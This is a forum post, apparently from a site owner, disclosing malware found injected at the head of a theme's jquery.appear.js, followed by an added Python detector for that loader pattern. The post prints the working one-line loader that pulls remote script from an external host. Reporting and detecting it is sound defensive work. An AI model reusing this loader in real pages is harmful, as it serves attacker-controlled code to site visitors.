Malicious function not detected in scans
Hello,
A few days ago my site was hacked.
Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.
After requesting several revisions without success, we found the problem.
A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.
It is only shown when loading certain pages in the browser code inside (it is not always shown…)
This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S, AIO S, and Anti-Malware Security and Brute-Force Firewall. None have detected it.
For this reason we are notifying each plugin to review this malicious code and add it in some way to their scan lists.
Apparently it is relatively new and little used; there are very few references on Google (https://www.google.com/search?q=cX458IXVf9TcXk%2FnhNa%2By0nWDAAY7JxpQFgRZT9%2FnUk%3D&newwindow=1&rlz=1C1UUXU_esAR993AR993&sxsrf=APwXEden26t fFRvJGkav31Fi7ZMfrTUvk)
Copy of the code found in the head of the file “jquery.appear.js”:
;(function(r,f,u,o,h,s){h=f.createElement(u);s=f.getElementsByTagName(u)[0];h.async=1;h.src=o; s.parentNode.insertBefore(h,s);})(window,document,'script','https://scripts.asi.services/cX458IXVf9TcXk/nhNa+y0nWDAAY7JxpQFgRZT9/nUk=');
I hope it works for you. Any questions ask me.
Greetings.
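Added example, not part of the original post and not code from any of the plugins named in it: a structural check for the loader shape shown above (create an element, set its src, insert it into the DOM) that flags any external host not on an allowlist. The function name, the 600-character window, the allowlist host cdn.example.com and the stand-in plugin body are assumptions made for illustration; the injected line is copied from the post.

```python
import re
from urllib.parse import urlparse

# Loader shape: an element is created, given a src, then inserted into the DOM.
CREATE = re.compile(r"\.createElement\s*\(")
SRC_SET = re.compile(r"\.src\s*=")
INSERT = re.compile(r"\.(insertBefore|appendChild)\s*\(")
# The tag name may be passed as an argument (as in the post), so look for the
# quoted word anywhere nearby instead of matching createElement('script').
SCRIPT_LIT = re.compile(r"""['"]script['"]""", re.I)
URL_LIT = re.compile(r"""['"]((?:https?:)?//[^'"\s]+)['"]""")
WINDOW = 600  # characters inspected after each createElement( call (assumed)


def find_script_injectors(js_source, allowed_hosts=()):
    """Return (offset, host, url) for loader snippets pointing at unlisted hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for m in CREATE.finditer(js_source):
        chunk = js_source[m.start():m.start() + WINDOW]
        if not (SRC_SET.search(chunk) and INSERT.search(chunk)
                and SCRIPT_LIT.search(chunk)):
            continue
        for url in URL_LIT.findall(chunk):
            full = url if url.startswith("http") else "https:" + url
            host = (urlparse(full).hostname or "").lower()
            if host and host not in allowed:
                findings.append((m.start(), host, url))
    return findings


# Line copied from the post (found at the head of jquery.appear.js).
INJECTED = (";(function(r,f,u,o,h,s){h=f.createElement(u);"
            "s=f.getElementsByTagName(u)[0];h.async=1;h.src=o; "
            "s.parentNode.insertBefore(h,s);})(window,document,'script',"
            "'https://scripts.asi.services/cX458IXVf9TcXk/nhNa+y0nWDAAY7JxpQFgRZT9/nUk=');")
# Constructed stand-ins: a legitimate plugin body and a legitimate loader.
PLUGIN_BODY = "(function($){$.fn.appear=function(fn){return this.each(fn);};})(jQuery);"
BENIGN_LOADER = ("var s=document.createElement('script');"
                 "s.src='https://cdn.example.com/lib.js';document.head.appendChild(s);")

if __name__ == "__main__":
    infected = INJECTED + "\n" + PLUGIN_BODY
    for off, host, url in find_script_injectors(infected, {"cdn.example.com"}):
        print(f"offset {off}: loads script from {host}: {url}")
```

Comparing theme and plugin files against checksums of the vendor's released copies remains the more reliable check, since a structural heuristic like this one only covers this loader shape.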